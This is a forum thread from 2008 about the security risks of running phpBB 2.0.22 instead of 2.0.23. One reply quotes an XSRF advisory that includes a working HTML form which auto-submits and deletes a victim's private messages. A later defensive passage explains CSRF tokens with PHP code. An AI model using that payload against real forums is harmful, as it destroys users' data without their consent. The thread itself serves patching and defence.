Not affiliated with or endorsed by the phpBB Group


Risks of running phpBB 2.0.22


 
Rodoom
PostPosted: Tue Dec 30, 2008 1:39 am 
Post subject: Risks of running phpBB 2.0.22

Hello,

I have been running a phpBB2 Plus forum (from here: http://www.phpbb2.de/dload.php?action=file&file_id=828) for almost 6 years now; however, that project died some months ago and they stopped updating the package.
So my problem (and question) is: which security problems could I be facing for running a phpBB 2.0.22 installation instead of a phpBB 2.0.23?

I would LOVE to upgrade to 2.0.23, however I don't have enough knowledge about the Plus package in order to do the manual code changes without affecting all the preinstalled mods.

Thank you.
espicom
PostPosted: Tue Dec 30, 2008 2:29 am 
Post subject: Re: Risks of running phpBB 2.0.22

The phpBB Plus people should have come up with their own version of the update by now, it's been out for some time.

Personally, I'd say the risk is not that high to the board; more and more of the changes I see are to fix problems with certain browsers. I'd be more concerned with the fact that you haven't seen an update package yet, since a lot of MODs go through security issues over time, and more MODs means more things to be watching/fixing.

(and no, I haven't applied the .23 patches to my boards, either)
Rodoom
PostPosted: Tue Dec 30, 2008 2:46 am 
Post subject: Re: Risks of running phpBB 2.0.22

Yes, I know... however the person in charge of the project stopped contributing to it, and since I don't have the time/knowledge to perform the individual mod upgrades as well as the phpBB one, we were left in the dark with our phpBB Plus installations.

As a matter of fact I am looking for a way to convert my forums to some other "all in one" project, or even phpBB 3, but I haven't seen any mods for it similar to the ones I care about the most (ezPortal and smartor gallery album), including some sort of "migration" tool for the data I have right now.

So far my forums have survived, so I am guessing either no one has had interest in trying to hack my boards or they are still somewhat secure, but this is not a desirable situation and I am looking for a fix.

Thanks anyway :)
~Cowboy~
PostPosted: Tue Dec 30, 2008 3:22 am 
Post subject: Re: Risks of running phpBB 2.0.22

You should make a backup of your board and try to do the manual install of .23 yourself. It's really not all that hard to do if you follow the instructions carefully. If you screw it up, just use the backup you just made to put the board back the way it was. ;)
_________________
We are not refugees, we are trail blazers. ;)
Ram
PostPosted: Tue Dec 30, 2008 8:54 am 
Post subject: Re: Risks of running phpBB 2.0.22

Actually there is no more risk in running with .0.22; this update (.0.23) was just smoke and mirrors.
cherokee red
PostPosted: Tue Dec 30, 2008 9:39 am 
Post subject: Re: Risks of running phpBB 2.0.22

Ram wrote:
Actually there is no more risk in running with .0.22; this update (.0.23) was just smoke and mirrors.

Quote:
* [Fix] Correctly re-assign group moderator on user deletion (Bug #280)
* [Fix] Deleting a forum with multiple polls included (Bug #6740)
* [Fix] Fixed postgresql query for obtaining group moderator in groupcp.php (Bug #6550)
* [Fix] Selected field on first entry by default for font size within posting_body.tpl (Bug #7124)
* [Fix] Adjusted maxlength parameters in admin/styles_edit_body.tpl (Bug #81)
* [Fix] Fixed html output in make_forum_select if no forums present (Bug #436)
* [Fix] Fixed spelling error(s) in lang_admin.php (Bug #7172, #6978)
* [Fix] Correctly display censored words in admin panel (Bug #12271)
* [Fix] Do not allow soft hyphen \xAD in usernames (reported by Bander00)
* [Fix] Fixed the group permission system's use of array access
* [Fix] Simple group permissions now work properly
* [Fix] Fix inability to export smilies (Bug #2265)
* [Fix] Fixing some problems with PHP5 and register_long_arrays off
* [Sec] Fix possible XSRF Vulnerability in private messaging and groups handling

_________________
phpBB MODs // My Music // Romance Designs :: coming soon
Former phpBB Moderator
Are you a musician in the Glasgow area interested in acoustic events? The ArtBox
Ram
PostPosted: Tue Dec 30, 2008 10:30 am 
Post subject: Re: Risks of running phpBB 2.0.22

Because you think it was all corrected in .0.23? There are security issues too in the actual version.

You are funny @ bb.com :lol:
Sylver Cheetah 53
PostPosted: Tue Dec 30, 2008 10:40 am 
Post subject: Re: Risks of running phpBB 2.0.22

In phpBB 2.0.22 you can delete all pm's of someone, according to this:
Code:
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability
by NBBN Type: Cross-Site Request Forgery
Founded: December 2007
################################################################


An attacker can send a link via pm to a site with the following html code to a
victim and all victim's pm's are going to be deleted when he clicks the link.
######Code##########################################################

<html>
<head>
</head>
<body onLoad="javascript:document.xsrf.submit()">

<form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post"
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">
</form>

</body>
</html>

You must update to phpBB 2.0.23. Try doing the manual code changes to your board running on your computer, and see how it goes. ;)

_________________
My Forum || My Blog

phpBB2 forever! :)
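The forged form quoted above works because privmsg.php accepts the deleteall request from any logged-in browser, and the browser attaches the victim's session cookie automatically. As an added example (not phpBB's or NBBN's code; written for PHP 7 or later), here is the per-session token check that defeats that class of request, with the vulnerable handling beside the hardened one; the function and field names (csrf_token, csrf_check, delete_all_*) are assumptions, not phpBB identifiers:

```php
<?php
// Added example, not phpBB's or NBBN's code: a per-session CSRF token of the
// kind that stops the privmsg.php "deleteall" forgery quoted above. Function
// and field names (csrf_token, csrf_check, delete_all_*) are made up here.
session_start();

// One secret per login session, embedded in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A page on another origin cannot read the victim's session, so it cannot
// supply the token; the cookie alone no longer suffices. hash_equals() is used
// so the comparison does not leak the token through timing.
function csrf_check(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Vulnerable pattern (what the advisory relies on): any POST carrying
// deleteall=true&confirm=Yes from a logged-in browser is honoured.
function delete_all_vulnerable(array $post, callable $delete_all): bool
{
    if (($post['deleteall'] ?? '') === 'true' && ($post['confirm'] ?? '') === 'Yes') {
        $delete_all();
        return true;
    }
    return false;
}

// Hardened pattern: identical, but refuses requests without a valid token.
function delete_all_hardened(array $post, callable $delete_all): bool
{
    return csrf_check($post) && delete_all_vulnerable($post, $delete_all);
}

// Demo with constructed requests: the forged form from the advisory carries no
// token and is rejected; the same fields plus the session token go through.
$deleted = 0;
$wipe    = function () use (&$deleted) { $deleted++; };
$forged  = ['mode' => '', 'deleteall' => 'true', 'confirm' => 'Yes'];
$genuine = $forged + ['csrf_token' => csrf_token()];
printf("forged: %s, deleted=%d\n", delete_all_hardened($forged, $wipe) ? 'allowed' : 'rejected', $deleted);
printf("genuine: %s, deleted=%d\n", delete_all_hardened($genuine, $wipe) ? 'allowed' : 'rejected', $deleted);
```

The token must also be written into the real privmsg.php form as a hidden field; a check like this is what a MOD author back-porting the 2.0.23 XSRF fix to a Plus board would be looking for.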
cherokee red
PostPosted: Tue Dec 30, 2008 12:09 pm 
Post subject: Re: Risks of running phpBB 2.0.22

Ram wrote:
Because you think it was all corrected in .0.23? There are security issues too in the actual version.

You are funny @ bb.com :lol:

My quote is directly from Meik's Announcement Post for the release of 2.0.23 ;)

_________________
phpBB MODs // My Music // Romance Designs :: coming soon
Former phpBB Moderator
Are you a musician in the Glasgow area interested in acoustic events? The ArtBox
Jim_UK
PostPosted: Tue Dec 30, 2008 3:28 pm 
Post subject: Re: Risks of running phpBB 2.0.22

Was that the vulnerability where you had to be logged in as Admin to be able to do it?
Quote:
Fix possible XSRF Vulnerability in private messaging and groups handling
My bolding of the word possible.
If that is the case then it may not be such an issue.
I would however (and did) do the update, as if someone were to take over the patching of phpBB2 for security reasons then surely their starting point would be 2.0.23 and not earlier versions (they were already done).

Jim
Rodoom
PostPosted: Wed Dec 31, 2008 11:41 pm 
Post subject: Re: Risks of running phpBB 2.0.22

Thanks all for your insight. I will try to patch the forum using an offline installation and then, if everything *seems* to go ok, release a beta version on the live server... after a week or two I will assume everything went ok and leave it upgraded.

If I succeed I will post the changes done here.

Thanks.